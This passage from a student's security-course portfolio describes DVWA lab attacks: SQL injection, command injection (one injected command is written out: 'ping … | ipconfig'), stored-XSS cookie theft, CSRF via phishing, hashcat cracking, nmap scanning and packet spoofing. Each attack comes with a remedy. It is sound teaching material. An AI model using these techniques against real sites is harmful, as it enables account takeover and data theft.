          original query, otherwise we get a error like the one displayed above. Now we can try
          something that has a little more impact.</p>
          <a href="../../img/portfolio/red/GetAllTables.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetAllTables.png" alt=""></a>
          <p>For example by getting all the table names inside the database. This is obvious not a
          good sign because I good use this to determine what the names are of the user tables and
          check if there might be some more tables I want to focus on, for example credit card
          information of the users.</p>
          <a href="../../img/portfolio/red/GetUserAndPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetUserAndPass.png" alt=""></a>
          <p>But in this case we won't go after people's credit card information but after there
          password. I know the user table name from the previous query and now I can just try some
          common column names like; username, user, name, those type of things.</p>
          <p>And we got a username and a hash! But now what? The username is simple but the password
          is hashed and can't be just copied and used.</p>
          <a href="../../img/portfolio/red/HashDecrypt.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/HashDecrypt.png" alt=""></a>
          <p>That's were this site comes in. I just insert the md5 hash in this decryptor and it
          checks a big database with common hashes and their decrypted word. And now I have the
          password and I can just login with admin/password.</p>
          <p>So how would you prevent this? The best thing to do is sanitize the queries. Make sure
          all the queries use prepared statements and are parameterised. This prevents people
          inserting for example strings instead of numbers and prevents them from ignoring your
          query and inserting their own.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: SQL injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal9" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Command injection</p>
          <p>I applied sql injection on a ping function in DVWA.</p>
          <a href="img/portfolio/Command%20injection.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/Command%20injection.png" alt=""></a>
          <p>The way this function works is it takes the ip and inserts it directly in a shell. It
          would probably looks like something like this "ping 'INSERTED_IP'".</p>
          <p>Now this little symbol "|" is called a pipe and it can be used to execute multiple
          commands in one line. So I used the "|" to execute my own command after the ping command
          just like shown above.</p>
          <p>I typed in the ip because it still needs to execute the ping command and after that I did
          a "ipconfig" so the command would look like this when executed in the shell: "ping
          185.230.127.234 | ipconfig" This gave us the ip information of the machine the webpage
          is running on.</p>
          <a href="../../img/portfolio/red/CmdCurrentUser.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdCurrentUser.png" alt=""></a>
          <p>I can also get the current user logged in user from the machine using "net user". But
          with "net user" you can do much more even change the password of the current user or
          create a completely new user just for me.</p>
          <a href="../../img/portfolio/red/CmdWifiPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdWifiPass.png" alt=""></a>
          <p>What is maybe even better I can get the wifi password of the connected pc in plain text.
          Now I can connect to the same network because I know the password.</p>
          <a href="../../img/portfolio/red/CmdEnterpriceWifi.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdEnterpriceWifi.png" alt=""></a>
          <p>This trick doesn't work with more advanced wifi security though. Here you see the eduroam
          network from school which is protected with 802.1x control. This doesn't mean you can't
          get the password at all it just makes it a whole lot harder.</p>
          <a href="../../img/portfolio/red/CIDIR.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CIDIR.png" alt=""></a>
          <p>I was also able to run the "dir" command. This tells me a lot about the local machine and
          how the web server is installed.</p>
          <a href="../../img/portfolio/red/CISystemInfo.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CISystemInfo.png" alt=""></a>
          <P>With the "systeminfo" command I'm able to get a lot of information about the physical
          machine which might be useful to me later. It greatly increases my attack surface.</P>
          <p>This can be prevented by sanitizing the input and not just inserting it straight into the
          shell. Make sure it goes to a parameterised function first, check the input and then
          insert it into a shell for example.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Command injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal10" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site scripting</p>
          <p>I will now show you how you could apply XSS to a website.</p>
          <a href="../../img/portfolio/red/XSSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlert.png" alt=""></a>
          <p>First I have to check if the website is vulnerable. The easiest way to check this is just
          to try a simple "Alert" script just like this.</p>
          <a href="../../img/portfolio/red/XSSAlertResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlertResult.png" alt=""></a>
          <p>As you can see the script works so that means that the website is vulnerable to XSS. Now
          I can try something that has some more impact and could actually be useful for me.</p>
          <a href="../../img/portfolio/red/MaxCharLimit.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/MaxCharLimit.png" alt=""></a>
          <p>This form doesn't allow more than 50 characters, so writing bigger scripts might make
          this difficult. Luckily they only validate this in the frontend so I can just inspect
          this page and change the maximum characters in the form. So now I can write some bigger
          scripts that give me more information.</p>
          <a href="../../img/portfolio/red/XSSGetCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>Like getting the cookie of the user so I can hijack their session.</p>
          <a href="../../img/portfolio/red/XSSGetCookieResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>So now I got the cookie it is my own though, but these scripts get stored inside the
          comments and the comments are persistent. Therefore I could also write a script that
          sends the cookie to me instead of displaying it. This way I can make it almost invisible
          for everyone to see and everyone who loads this page their cookie gets send to me.</p>
          <a href="../../img/portfolio/red/XSSOldCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSOldCookie.png" alt=""></a>
          <p>Now I can try to use the cookie that I stole in the previous picture to try and login. As
          you can see my cookie is now different and I'm not logged in.</p>
          <a href="../../img/portfolio/red/XSSNewCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSNewCookie.png" alt=""></a>
          <p>Now I placed the cookie I stole in my own cookie to hopefully make the website think I'm
           the person who is logged in that I stole this cookie from.</p>
          <a href="../../img/portfolio/red/XSSSessionHijack.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSSessionHijack.png" alt=""></a>
          <p>And now when I try to load the index page the website thinks I'm logged in as the person
          the cookie belongs to and I hijacked their session. I can now do everything on their
          account, comment in their name and change their data or steal their data.</p>
          <p>And if this person is by any chance an admin I might be able to do some more extreme
          things as well. Like creating or deleting users or their comments.</p>
          <a href="../../img/portfolio/red/XSSIframe.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframe.png" alt=""></a>
          <P>Sometimes the programmers try to prevent XSS by filtering out the script tags. But they
          forget the filter out all the other HTML tags. So I can load my own website in an
          "Iframe".</P>
          <a href="../../img/portfolio/red/XSSIframeResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframeResult.png" alt=""></a>
          <p>This might only sound as good free marketing but you can also do other things. Like
          redirecting everyone that visits this page to my own website or inject scripts in other
          html tags, so I can still run my scripts even though they banned the script tags.</p>
          <p>These type of attacks can be prevented by sanitizing the input much like SQL injection.
          Make sure that all the text that users can post to the website's frontend doesn't get
          converted to straight HTML. In this way they can't exploit other HTML tags as well.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site scripting</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal11" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site request forgery</p>
           <p>Now I'm going to exploit CSRF on a website. The principles are quite simple, if you see
          the query that is called in the search bar, then the website might be vulnerable.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>As you can see in the search bar the website creates a query. If I would send this query
          without the form it would work as well but only for me. So I need to get this link to an
          user fill in my own password and make him click it.</p>
          <a href="../../img/portfolio/red/CSRFHTMLFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFHTMLFile.png" alt=""></a>
          <p>So I created a little phishing email using HTML. By using HTML I can make the email as
          legit as possible. By hiding the actual link in a text or even adding the DVWA logo. If
          I would know how they normally would send emails to their users, I could fully recreate
          it and you won't see the difference.</p>
          <a href="../../img/portfolio/red/CSRFUserEmail.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFUserEmail.png" alt=""></a>
          <p>The user would get an email like this and if you add urgency to the message, the user
          might not even think about any red flags because they feel the need to act as fast as
          possible.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>Now the user got send to the same page to change your password, but I already changed it
          when it loaded the page.</p>
          <a href="../../img/portfolio/red/CSRFLogin.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLogin.png" alt=""></a>
          <p>Now if the user tries to login he can't because the password is changed, and I can log
          into his account and exploit it as much as I want.</p>
          <p>These type of attacks can be prevented by using things like a CAPTCHA or asking the user
          to fill in their old password. Even though this cannot fully prevent this type of attack
          it will make it a lot harder to succeed</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site request forgery</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
           </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal12" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Path traversal</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Path traversal</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal13" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Password cracking</p>
          <p>Now I'm going to show to basics of password cracking.</p>
          <p>
          There are a few main ways to crack passwords
          <ul>
          <li>Brute forcing</li>
          <li>Dictionary attacks</li>
          <li>Rainbow tables</li>
          </ul>
          </p>
          <p>Brute forcing is the most basic way to crack a password, it just tries every possible
          combination of letters. It has a few pros and some big cons.</p>
          <p>Brute forcing is rarely used these days just for the simple reason that cracking a modern
          encrypted password would take more then a lifetime. It also costs a lot of computing
          power because it generates the hashes on the fly and there are a lot of hashes to
          generate and try. The pro is though that it doesn't use any storage space because it
          generates everything instead of getting them for a wordlist. Brute forcing could be an
          option when you know that the password that you're cracking isn't a existing word but
          rather a string of random numbers and letters. Even though brute forcing might be the
          only option in that case, you're probably better off finding another way to get the
          password.</p>
          <p>Dictionary attacks are more sophisticated, it's way more efficient and faster but there a
          big con.</p>
          <p>Dictionary attacks use a predefined list of words and generates hashes for them and then
          compare them to the hash you want to crack to see if any of them match. The pro is that
          this is way faster. The downside on the other hand is that if the password you want to
          crack isn't in the word list you have no chance of success. The dictionary attack could
          be extended by generating multiple versions of every word some with captitals some with
          random numbers after them etc. A dictionary attack could also be made very personal and
          tailored to the specifications of your target. For example adding the targets place of
          work or pet names to the list. Also if you want more chance of success you'll need a
          bigger word list and those can grow pretty fast costing thus a lot of storage space.</p>
          <p>Rainbow tables are in essence a lot like dictionary attacks, but actually better.</p>
          <p>Rainbow tables contain like a dictionary attack a wordlist. The difference is that the
          wordlist is already hashed and could contain all possible solutions making a look like a
          brute force. You could for instance create a rainbow table having every possible
          solution making it a bruto force but more efficient costing less time, or generate
          hashes for your dictionary attack wordlist which might be reusable costing you less time
          in the future. Rainbow tables do come with some downsides like it costs a lot of
          harddisk space, less then a dictionary attack of the same size because it uses lossless
          compression, but if you want a lot of possibilities it will still be a big file. The
          hash type like MD5 or SHA256 is static thus making it less versatile/useful when you
          don't know the encryption type. Same goes for the salt, a salt could be added to the
          list but it will make the file even bigger. A problem that you won't have with a
          dictionary attack or brute force because the hashes get generated in the fly.</p>
          <p>A good way to make encrypted passwords harder to crack is by using a salt or a pepper. A
          salt is random data added to the password before it's hashed, and because it's different
          for every new password it gets stored alongside the password. This has a pro and a con.
          The pro is that the salt is different for every password meaning that if one password
          gets compromised the others are still save. The downside is though that if someone
          breaches the database he will know the salts for each password instantly. Now a pepper
          uses the same method to encrypt a password, it is random data and adds it to the
          password before it's hashed. But a pepper is static and is stored separately from the
          password hashes. Now this method has a pro and con as well. The pro is that if the
          database is breached the hacker won't know the pepper making cracking the passwords a
          lot harder. The con is that if he finds the pepper all the passwords are compromised,
          but to do that he might need to decompile the code and find the pepper, which is a lot
          harder than breaching the database most of the time.</p>
          <a href="../../img/portfolio/red/CrackHashGenerate.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashGenerate.png" alt=""></a>
          <p>I created a small demonstration on hacking a simple MD5 hash. So I first of all created a
          hash for the string "password".</p>
          <a href="../../img/portfolio/red/CrackHashId.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashId.png" alt=""></a>
          <p>If I would have stole this hash from some database I might not know the hash type, which
          is important for me to know if I want to save time or use a rainbow table. So I ran
          "Hash-identifier" and gave it the hash. This gives me an idea what the hash type might
          be.</p>
          <a href="../../img/portfolio/red/CrackHashFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashFile.png" alt=""></a>
          <p>I placed the has in a file. In this case there's only one hash in there but in reality
          this list could contain all the hashes from a certain database.</p>
          <a href="../../img/portfolio/red/CrackHashResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashResult.png" alt=""></a>
          <p>Now I used "Hashcat" to crack the password using a wordlist called "rockyou". This
          wordlist contains the most common password based on data breaches in the past. As you
          can see it cracked the password and it only took 1 second. Do mind that in this case the
          password was high up in the wordlist. The program only went through 0.03% of the entire
          wordlist, if the password was much lower in the list this would take a lot longer.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Password cracking</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal14" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
           <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network scanning and enumeration</p>
          <p>To create a demo for this a made up a scenario. The scenario is that I got VPN access to
          a place I want to hack and I want to know how the network looks like. This is no actual
          hack but mere a VPN tunnel to my own home.</p>
          <a href="../../img/portfolio/red/NetworkScanConnVPN.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanConnVPN.png" alt=""></a>
          <p>So I looked up in which IP range I was so I had a clue from which I could continue.</p>
          <a href="../../img/portfolio/red/NetworkScanDone.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDone.png" alt=""></a>
          <p>I did a network scan using NMap in the ip range that I was connected to. As you can see
          on the left hand side there are some machines that came up in the scan which I could
          take a look at.</p>
          <a href="../../img/portfolio/red/NetworkScanTopology.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanTopology.png" alt=""></a>
          <p>I took a look at the topology of the network first. This is a easy way to get an overview
          of the network, all with connected routers, AP's and switches. I can also see in this
          diagram that there are some devices in red which mean they have 6 or more open ports,
          those devices might be more interesting to me</p>
          <a href="../../img/portfolio/red/NetworkScanNASHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASHost.png" alt=""></a>
          <p>I see that this machine is different from the rest, it's the only one running FreeBSD so
          that might be interesting.</p>
          <a href="../../img/portfolio/red/NetworkScanNASPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASPorts.png" alt=""></a>
          <p>This machine has open ports for the smb protocol which could mean this is a NAS. I could
          use this information to go further and get for example access to the samba shares.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterHost.png" alt=""></a>
          <p>Using the before mentioned topology graph I noticed that the router has a lot of open
          ports as well. Getting into a network's router could give me more access to other parts
          of the network.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterPorts.png" alt=""></a>
          <p>Here I can see that the router has some open ports for ssh, telnet and some webserver I
          can poke at.</p>
          <a href="../../img/portfolio/red/NetWorkScanDesktopHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanDesktopHost.png" alt=""></a>
          <p>While looking at the topology graph I saw another machine with a lot of open ports so I
          took a look, and it looks like a windows machine.</p>
          <a href="../../img/portfolio/red/NetworkScanDesktopPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDesktopPorts.png" alt=""></a>
          <p>There are a few different open ports on this machine then other regular desktops. Like a
          MariaDB which I could try to access or take a look at the webserver. The Windows RPC
          protocol is running on an open port which I can utilize to get in because there are some
          known exploits for that.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network scanning and enumeration</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal15" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network sniffing and spoofing</p>
          <p>I will show 2 little demos as a proof of concept.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPSite.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPSite.png" alt=""></a>
          <p>I have a "pi-hole" server running on my network that acts as my home dns server. It has a
          login screen for a dashboard with statistics but it is not HTTPS secured. So I tried
          catching the password with Wireshark while logging in.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPResult.png" alt=""></a>
          <p>When I filter Wireshark to only HTTP and logged in in te website I can see my IP and the
          website's IP. When I open the packet and took a look what's inside, you can see the form
          post with password in plain text. Now this website doesn't hash the password so I can
          see the password in plain text, otherwise I would have seen a hash which I had to
          decrypt to get the password.</p>
          <a href="../../img/portfolio/red/ScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/ScapyPacket.png" alt=""></a>
          <p>I created a fake IPV4 packet using "scapy". I made it so that it looks like the packet is
          coming from google, but It's actually from me and I put my malicious code in it.</p>
          <a href="../../img/portfolio/red/WireSharkScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WireSharkScapyPacket.png" alt=""></a>
          <p>I captured the packet with Wireshark and as you can see the source address is google, but
          when you look in the raw my malicious code is in there.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network sniffing and spoofing</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal16" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Law, Ethics and Responsible Disclosure</p>
          <p>The Ethics are both quite abstract though logical at the same time. The are written in an
          abstract manner in which they could apply to even other things than hacking. Thus making
          it logical as well. Many things you wouldn't do to someone in real life you wouldn't do
          online. I think it's the same point <a href="https://www.youtube.com/watch?v=HmZm8vNHBSU">these</a> guys tried to make,
          except badly executed.</p>
          <P>In my opinion the internet is one of the last few free places there are in the world.
          Though sometimes tightly controlled by governments, look at China or North-Korea, people
          still find ways around the system to express their voices. I agree with the ethics being
          like gentlemen rules, just don't be a dick to someone, don't do anything you wouldn't
          want to be done to yourself. But this doesn't include expressing your opinion even
          though it might hurt some people. On the internet you still got the right to say those
          things the same as people having the right to disagree and say something about it. While
          in the real world when you say something wrong people will call it a form of
          discrimination and you'll get prosecuted. Thus undermining the freedom of speech and
          creating more and more censorship.</P>
          <p>These are the responsible disclosures of companies I compared.</p>
          <ul>
          <li><a href="https://www.google.com/about/appsecurity/">Google</a></li>
          <li><a href="https://support.apple.com/en-us/HT201220">Apple</a></li>
          <li>
          <a href="https://fontys.nl/Over-Fontys/Organisatie-en-sturing/Onze-organisatieNieuw/Regelingen-statuten-en-reglementen/Responsible-disclosure-Fontys-Hogescholen.htm">Fontys</a>
          </li>
          </ul>
          <p>The first things that stood out to me was the rewards. While Google and Apple being big
          corporations reward the people with big sums of money, the Fontys rewards them by
          putting their name on the wall of fame. Looking at other smaller companies it is more
          common to give some merchandise, putting their names on the hall of fame or giving a
          small amount of money compared to the big numbers Google and Apple are giving as
          rewards.</p>
          <p>What they all have in common is that they want a full detailed report of what you did so
          they can reproduce the scenario. They all don't want you to make anything public before
          they had a chance to fix it and don't dig any deeper in sensitive date that is necessary
          to proof the vulnerability.</p>
          <p>They all also state that even though you did anything illegal while proofing the
          vulnerability, if you follow their responsible disclosure and follow their rules they
          won't pursue any legal actions.</p>
          <p>It is quite logical that companies don't prosecute these people and give them rewards
          instead, because if you think about it they will lose far less money when they pay these
          rewards then if they get hacked by a real threat. Looking at <a href="https://www.bugcrowd.com/bug-bounty-list/">this</a> website a lot of
          companies share that same ideology.</p>
          <ul class="list-inline">
          <li>Date: December 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Law, Ethics and Responsible Disclosure</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal17" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Basic hacking process</p>
          <p>First lets talk about the basic hacking process. This is a process most hackers will
          follow when conducting a hack, good or bad. Though good and bad use this process there
          is a key difference between the two.</p>
          <a href="../../img/portfolio/red/hackingstappen.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/hackingstappen.png" alt=""></a>
          <p>These are the basic hacking steps that are needed to conduct a good hack.</p>
          <h3>Intel Gathering</h3>
          <p>Intel gathering is the first step in the basic hacking process. In this step the hacker
          tries to gain as much information on his target as possible. He'll conduct for instance
          a OSINT, go to the physical location of his target and get a feel for the place and
          maybe even use social engineering to call his target and try to extract information.</p>
          <h3>Footprint</h3>
          <p>Now the hacker will conduct a network scan and try to gain as much information on the
          target's network as possible. He needs to find a foothold from which he can continue
          further, think about ip ranges, open ports, OS versions and important servers.</p>
          <h3>Vuln Analysis</h3>
          <p>The hacker will now look for any out of date software or operating systems to use
          exploits on. Whenever he'll find a software version he'll look if there's a CVE entry
          for that he could exploit. He might also use some automated tools to find common
          vulnerabilities for him. The hacker will also try any website for web vulnerabilities
          like SQL injection, command injection, CSRF and XSS.</p>
          <h3>Exploitation</h3>
          <p>Now is time for action. The hacker will use the information and vulnerabilities he found
          in the previous step to use his exploits. Thus gaining access to his target or the
          information he's after. Most ethical hackers/pentesters will stop after this step or not
          even do this step at all because it might result in destabilizing or shutting down the
          targets network.</p>
          <h3>Post Exploitation</h3>
          <p>This step and the following is more applicable to the bad actors out there. Here the
          hacker will extract the data he's after, edit some data, create new accounts and setup
          persistence for a backdoor so he can come back later without going through the same
          process again or have the risk of the target patching the vulnerability he used.</p>
          <h3>Clean Up</h3>
          <p>This step is very important for bad actors to not get caught. Here the hacker will try to
          remove all of his footsteps like logs. Therefore the police or target will not be able
          to track him down or even know what he did in the first place.</p>
          <a href="../../img/portfolio/red/Cyber-Kill-Chain.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/Cyber-Kill-Chain.png" alt=""></a>
          <p>Now this is the cyber kill chain even though it's comparable to the basic hacking process
          there are some differences.</p>
          <h3>Reconnaissance</h3>
          <p>Here the hacker will conduct recon comparable to the intel gathering stage in the basic
          hacking process.</p>
          <h3>Weaponization</h3>
          <p>In this step the hacker is already creating a payload with an exploit to attack his
          target. It is notable that in the cyber killchain they skip the footprint and vuln
          analysis stages.</p>
          <h3>Delivery</h3>
          <p>Now the payload is to be delivered to the target this can be done by phising email,
          rubber ducky and so on. This stage is also not present in the basic hacking process,
          there it's more part of the exploitation stage.</p>
          <h3>Exploitation</h3>
          <p>When the payload is delivered the hacker will activate his attack.</p>
          <h3>Installation</h3>
          <p>In this stage the hacker will install for example malware to create persistence for a
          backdoor or to act more stealthy. This would happen in the post exploitation stage in
          the basic hacking process.</p>
          <h3>Command & Control</h3>
          <p>Now the installed malware will call back to the command and control system and give the
          hacker control of the hacked system. This can be both part of the exploitation and post
          exploitation stage in the basic hacking process.</p>
          <h3>Actions on Objectives</h3>
          <p>Here the hacker will do whatever his intentions were.</p>
          <h4>The minimal requirements for a good pentest contract and pentest report</h4>
          <p>In a good pentest contract there should be a clearly defined scope and procedures in case
          of emergency. The contract should also include a confidentiality agreement. The pentest
          report should include the scope and goal of the project with the findings and how it was
          done. It should be explained very carefully and readable for people that weren't aware
          of the project. The most important thing is ofcourse the advice to give to the company,
          this way they'll be able to fix any security leaks and the pentest was a success.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Basic hacking process</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal18" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Self reflection</p>
          <p>The semester started quite slowly for me. It wasn't really clear for me were I should
          start and were I should look for the right information. This semester was quite
          different from the defending one. In the defending semester everything went quite easy
          and smooth and I had a clear goal that I wanted to achieve, I felt like I missed that
          this semester, hens why it didn't start so smoothly.</p>
          <p>I started this semester with absolutely no knowledge in hacking into things. I learned
          quite a lot this semester, must of the things I learned listening to podcasts and
          understanding the different concepts and trying different things on DVWA.</p>
